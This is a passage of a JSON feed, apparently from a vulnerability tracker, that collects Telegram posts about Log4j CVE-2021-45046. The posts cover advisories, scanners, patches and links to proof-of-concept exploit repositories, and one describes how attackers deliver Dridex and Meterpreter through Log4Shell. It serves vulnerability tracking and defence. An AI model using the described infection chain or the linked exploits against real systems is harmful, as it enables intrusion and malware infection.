\u0437\u0430\u0446\u0438\u043a\u043b\u0438\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u0432\u0430\u0440\u0438\u0439\u043d\u043e\u0433\u043e \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u0445 \u0441\u0442\u0440\u043e\u043a. \u041d\u043e \u0432\u0440\u043e\u0434\u0435 \u043a\u0430\u043a \u0441 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u043c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c Log4j 2.17, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0438 \u043f\u0440\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441 Java 8.\n\n\u0411\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432\u0447\u0435\u0440\u0430 Cryptolaemus \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438 \u043e \u043d\u043e\u0432\u043e\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f Log4Shell \u0434\u043b\u044f \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u043c \u0442\u0440\u043e\u044f\u043d\u043e\u043c \u00abDridex\u00bb \u0438\u043b\u0438 \u00abMeterpreter\u00bb.\n\n\u0418 \u0434\u0430\u043d\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u043e\u043b\u0435\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0432\u0435\u0434\u044c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0434\u0430\u0436\u0435 \u043d\u0435 \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u0437\u043d\u0430\u0442\u044c \u043a\u0430\u043a\u0430\u044f \u0443 \u0436\u0435\u0440\u0442\u0432\u044b \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430. \u0412\u0441\u0435 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e Java \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0444\u0430\u0439\u043b HTA, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u0430\u043c \u0442\u0440\u043e\u044f\u043d Dridex, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows. \u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u044b Windows \u043d\u0435 \u043c\u043e\u0433\u0443\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u0441\u044f \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u0441\u044f, \u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u043d\u0435 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u044d\u0442\u0438\u0445 \u0437\u0430\u0434\u0430\u0447 \u0438 \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u043d\u0430 Python \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 Meterpreter, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043a\u0430\u043a \u0440\u0430\u0437 \u043f\u0440\u0438\u0441\u043f\u043e\u0441\u043e\u0431\u043b\u0435\u043d \u0434\u043b\u044f \u041e\u0421 Linux / Unix.\n\n\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 Log4j \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0430\u043c\u0438, \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0449\u0438\u043c\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u0441\u043f\u0435\u043a\u0442\u0440 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u043d\u0435\u0443\u0434\u0438\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e, \u0447\u0442\u043e \u0431\u043e\u043b\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043d\u0430\u0447\u043d\u0443\u0442 \u043d\u0430\u0446\u0435\u043b\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c.\n\u0410 \u043d\u0430\u043c \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043e\u0431\u043d\u043e\u0432\u043b\u044f\u0442\u044c\u0441\u044f \u0434\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0441 \u043d\u043e\u0432\u044b\u043c\u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438, \u0441\u043a\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c Log4j \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432\u0441\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u043c\u0438 \u0441\u043a\u0430\u043d\u0435\u0440\u0430\u043c\u0438, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, log4jScanner.\n@NeKaspersky", "creation_timestamp": "2021-12-22T15:51:02.000000Z"}, {"uuid": "11be1803-675d-4278-bc91-031cad2401b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/cibsecurity/48659", "content": "\u203c CVE-2021-4125 \u203c\n\nIt was found that the original fix for log4j CVE-2021-44228 and CVE-2021-45046 in the OpenShift metering hive containers was incomplete, as not all JndiLookup.class files were removed. This CVE only applies to the OpenShift Metering hive container images, shipped in OpenShift 4.8, 4.7 and 4.6.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-08-24T20:22:51.000000Z"}, {"uuid": "e331e314-9711-462c-97f4-67373a7689a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/thehackernews/1730", "content": "URGENT: Apache Foundation has issued a new patch (CVE-2021-45046) for Log4j utility after the previous patch for the recently disclosed Log4Shell exploit (CVE-2021-44228) was deemed incomplete in certain non-default configurations.\n\nDetails: https://thehackernews.com/2021/12/second-log4j-vulnerability-cve-2021.html", "creation_timestamp": "2021-12-15T06:36:47.000000Z"}, {"uuid": "2b351ad9-a5b6-4f8a-9a3c-1dd3ad605b63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/cibsecurity/33979", "content": "\u203c CVE-2021-45046 \u203c\n\nIt was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (<2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-14T22:14:54.000000Z"}, {"uuid": "516dfd9b-701e-4b94-b455-1df2571a6643", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/cibsecurity/44725", "content": "\u203c CVE-2022-33915 \u203c\n\nVersions of the Amazon AWS Apache Log4j hotpatch package before log4j-cve-2021-44228-hotpatch-1.3.5 are affected by a race condition that could lead to a local privilege escalation. This Hotpatch package is not a replacement for updating to a log4j version that mitigates CVE-2021-44228 or CVE-2021-45046; it provides a temporary mitigation to CVE-2021-44228 by hotpatching the local Java virtual machines. To do so, it iterates through all running Java processes, performs several checks, and executes the Java virtual machine with the same permissions and capabilities as the running process to load the hotpatch. A local user could cause the hotpatch script to execute a binary with elevated privileges by running a custom java process that performs exec() of an SUID binary after the hotpatch has observed the process path and before it has observed its effective user ID.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-17T16:23:35.000000Z"}, {"uuid": "7de24c5a-c0b1-455b-a638-857fb95ef054", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/thehackernews/1734", "content": "Attackers have started exploiting the 2nd Log4J vulnerability (CVE-2021-45046), while a third vulnerability has already been reported and its technical details are expected to be published soon.\n\nDetails + PoC for 3rd: https://thehackernews.com/2021/12/hackers-begin-exploiting-second-log4j.html", "creation_timestamp": "2021-12-16T07:29:41.000000Z"}, {"uuid": "2d5b7b8b-7af9-499f-a805-5f73fc21cee2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/thehackernews/3303", "content": "Heads up, everyone! \n \nCISA has issued an advisory warning of active exploitation of three known vulnerabilities, including CVE-2023-1389 (TP-Link Archer AX-21), CVE-2021-45046 (Apache Log4j2) and CVE-2023-21839 (Oracle WebLogic). \n \nDetails: https://thehackernews.com/2023/05/active-exploitation-of-tp-link-apache.html", "creation_timestamp": "2023-05-02T07:47:51.000000Z"}, {"uuid": "e1941044-ae32-4fff-af23-7968ff8b70c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1509", "content": "#CVE-2021\n#Log4j \nSamples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228.\n\nhttps://github.com/mergebase/log4j-samples\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T22:06:43.000000Z"}, {"uuid": "7f2a9ef1-fd11-442b-9927-b66bbba11362", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1501", "content": "#CVE-2021\n#log4j2 \nScanner local em Python para localizar e identificar vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco com an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\n\nhttps://github.com/andalik/log4j-scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:51:01.000000Z"}, {"uuid": "ffdd7144-5dbc-4cf2-82ba-b00d04e09e19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/BlueRedTeam/1512", "content": "#Exploit \n1. CVE-2021-45046:\nLog4j 2.15.0 stills allows for exfiltration of sensitive data\nhttps://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data\n\n2. CVE-2021-41962:\nStored XSS in Vehicle Service Management System 1.0\nin Sourcecodester\nhttps://github.com/lohyt/-CVE-2021-41962\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T07:40:04.000000Z"}, {"uuid": "90fb255a-7df1-47ab-9dd0-c29d486e9be7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/CyberSecurityTechnologies/5049", "content": "#hardening\n#Automotive_Security\nExamining Log4j Vulnerabilities in Connected Cars and Charging Stations\nhttps://www.trendmicro.com/en_us/research/21/l/examining-log4j-vulnerabilities-in-connected-cars.html\n]-> Guide: How To Detect and Mitigate the Log4Shell Vulnerability (CVE-2021-44228/CVE-2021-45046)\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide", "creation_timestamp": "2024-10-04T07:31:39.000000Z"}, {"uuid": "3c83c4ec-b29f-44b7-a24e-d30b9b335ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1463", "content": "#CVE-2021\n#Log4j \nLog4j 2.15.0 Privilege Escalation -- CVE-2021-45046\n\nhttps://github.com/cckuailong/Log4j_CVE-2021-45046\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T07:07:01.000000Z"}, {"uuid": "0a6a5ebb-2d74-41ac-9bac-e2a0884f1420", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1473", "content": "#CVE-2021\n\nReplicating CVE-2021-45046\n\nhttps://github.com/tejas-nagchandi/CVE-2021-45046\n\n@BlueRedTeam", "creation_timestamp": "2021-12-15T18:04:31.000000Z"}, {"uuid": "08b6cd0c-4f1d-4ae4-8a19-3a2aa2d3fbae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1504", "content": "#CVE-2021\n#log4j2\nScanner local em Python para varredura e localiza\u00e7\u00e3o de vers\u00f5es vulner\u00e1veis do Log4j2 em arquivos no disco, contemplando an\u00e1lise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046)\n\nhttps://github.com/andalik/log4j-filescan\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T17:03:26.000000Z"}, {"uuid": "ba7fd7b3-a320-4bfc-bf74-b21f5e5e1fb6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1505", "content": "#CVE-2021\n#Log4j \nBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\n\nhttps://github.com/DXC-StrikeForce/Burp-Log4j-HammerTime\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T18:26:15.000000Z"}, {"uuid": "e094f2a9-968e-41b0-b299-7abaffe0a416", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1527", "content": "#CVE-2021\n#Log4j \nProvide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself\n\nhttps://github.com/Aschen/log4j-patched\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T21:10:01.000000Z"}, {"uuid": "d53159b8-b9fa-41a1-b560-f1786b431045", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1495", "content": "#CVE-2021\n#Log4j \nBurp extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046\n\nhttps://github.com/DXC-StrikeForce/Burp-Log4Shell-Active-Scanner\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T14:03:36.000000Z"}, {"uuid": "57a0f2dd-f061-4bc5-9b85-2753ad98369f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1496", "content": "#CVE-2021\n#Log4j \nBurp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046\n\nhttps://github.com/freskimo/Burp-Log4j-HammerTime\n\n@BlueRedTeam", "creation_timestamp": "2021-12-16T15:36:42.000000Z"}, {"uuid": "85edd762-5c99-45ee-8f1b-627c169a36e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/BlueRedTeam/1514", "content": "#Blue_Team\n1. LOLBins Are No Laughing Matter:\nHow Attackers Operate Quietly\nhttps://www.uptycs.com/blog/lolbins-are-no-laughing-matter\n2. Protection against CVE-2021-45046, the additional Log4j RCE vulnerability\nhttps://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T07:46:01.000000Z"}, {"uuid": "481a4ecd-6000-453d-9035-4b227f34009a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1533", "content": "#CVE-2021\n#Log4j \nA simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228.\n\nhttps://github.com/lukepasek/log4jjndilookupremove\n\n@BlueRedTeam", "creation_timestamp": "2021-12-17T22:38:24.000000Z"}, {"uuid": "0384670b-8e21-4c2e-b6d6-321a27363967", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1536", "content": "#CVE-2021\n#Log4j \ncan find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046\n\nhttps://github.com/DANSI/PowerShell-Log4J-Scanner\n@BlueRedTeam", "creation_timestamp": "2021-12-18T01:57:32.000000Z"}, {"uuid": "ee8f5a46-ccf6-427a-891b-c26226c6d7ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1547", "content": "#CVE-2021\n#Log4Shell\nSearches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones.\n\nhttps://github.com/HynekPetrak/log4shell_finder\n\n@BlueRedTeam", "creation_timestamp": "2021-12-19T09:50:02.000000Z"}, {"uuid": "6d6edfbd-ea9f-4d60-a2ce-69116975e72b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "exploited", "source": "https://t.me/BlueRedTeam/1548", "content": "#CVE-2021\n#log4j \nVulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104\n\nhttps://github.com/TheInterception/Log4J-Simulation-Tool\n\n@BlueRedTeam", "creation_timestamp": "2021-12-19T10:03:53.000000Z"}, {"uuid": "bf3bbc22-ca07-437d-bdec-d2b58bff6c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/BlueRedTeam/1557", "content": "#CVE-2021\n#Log4j \n#CheetSheet\n\nLog4J CVE-2021-44228 : Mitigation Cheat Sheet\n\nhttps://github.com/thedevappsecguy/Log4J-Mitigation-CVE-2021-44228--CVE-2021-45046--CVE-2021-45105\n\n@BlueRedTeam", "creation_timestamp": "2021-12-22T10:05:35.000000Z"}, {"uuid": "3a8e8536-270a-45c9-8142-7b3e272ee9a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5115", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Dec 1-31)\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-45046 - Apache Log4j DoS\nCVE-2021-42278, CVE-2021-42287 - AD Domain Services EoP Vulnerability\nCVE-2021-44832 - Apache Log4j 2.17.0\nCVE-2021-45105 - DoS via Uncontrolled Recursion in Log4j Strsubstitutor\nCVE-2021-43798 - Grafana 8.x Path Traversal\nCVE-2021-44077 - PreAuth RCE in ManageEngine ServiceDesk Plus\nCVE-2021-4422 - Log4j vulnerability\nCVE-2021-44515 - Zoho ManageEngine Desktop Central Pre-auth RCE", "creation_timestamp": "2024-10-21T16:08:53.000000Z"}, {"uuid": "141979d9-132f-44da-b206-7228e1ef612a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/4997", "content": "#Blue_Team_Techniques\n1. LOLBins Are No Laughing Matter:\nHow Attackers Operate Quietly\nhttps://www.uptycs.com/blog/lolbins-are-no-laughing-matter\n2. Protection against CVE-2021-45046, the additional Log4j RCE vulnerability\nhttps://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability", "creation_timestamp": "2021-12-17T11:07:01.000000Z"}, {"uuid": "c5aff9f3-6ca8-495e-95b8-9fa04c0e099f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/4991", "content": "#exploit\n1. CVE-2021-45046:\nLog4j 2.15.0 stills allows for exfiltration of sensitive data\nhttps://www.praetorian.com/blog/log4j-2-15-0-stills-allows-for-exfiltration-of-sensitive-data\n\n2. CVE-2021-41962:\nStored XSS in Vehicle Service Management System 1.0 in Sourcecodester\nhttps://github.com/lohyt/-CVE-2021-41962", "creation_timestamp": "2024-10-21T16:03:37.000000Z"}, {"uuid": "08ab8a01-242e-4172-be83-0d4c9ba0e7ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/LearnExploit/3135", "content": "\u06a9\u0634\u0641 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0648\u0645 \u0648 \u062c\u062f\u06cc\u062f \u062f\u0631 \u0648\u0631\u0698\u0646 2.15 \u062f\u0631 Log4j \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 CVE-2021-45046 \n\n\u0627\u06cc\u0646 \u0628\u0627\u0631 \u0628\u0647 \u062c\u0627\u06cc Log4shell \u0645\u0627 Log4dos \u0631\u0648 \u0634\u0627\u0647\u062f \u0647\u0633\u062a\u06cc\u0645 \u06a9\u0647 \u0631\u0648\u06cc \u062a\u0627\u0631\u06af\u062a \u0645\u06cc\u062e\u0648\u0631\u0647 \n\n\u0628\u0627\u06cc\u062f \u0628\u0647 \u0648\u0631\u0698\u0646 2.16 \u0627\u067e\u062f\u06cc\u062a \u06a9\u0646\u06cc\u062f \u06cc\u0627 Jndi \u0631\u0648 \u06a9\u0644\u0627 \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u062f . \n\n\u062a\u0645\u0627\u0645\u06cc \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Log4j \u0627\u0632 Beta9-2.0 \u062a\u0627 2.12.1 /2.13.0 \u0648 2.15.0 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u0647\u0633\u062a\u0646\u062f \n\n#Log4J #Log4dos #Log4shell\n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2022-01-18T19:37:12.000000Z"}, {"uuid": "780a4c3f-ebb6-4f17-9529-0b1297186d67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-45046", "type": "seen", "source": "https://t.me/tarnkappe/4075", "content": "\ud83d\udcec Log4Shell Patch per Exploit (CVE-2021-44228 + CVE-2021-45046) #Artikel #Hacking #ChrisThompson #ForrestAllison #FreeWortley #log4j #Log4Shell #Patchploit https://tarnkappe.info/log4shell-patch-per-exploit-cve-2021-44228-cve-2021-45046/", "creation_timestamp": "2021-12-16T22:18:05.000000Z"}]}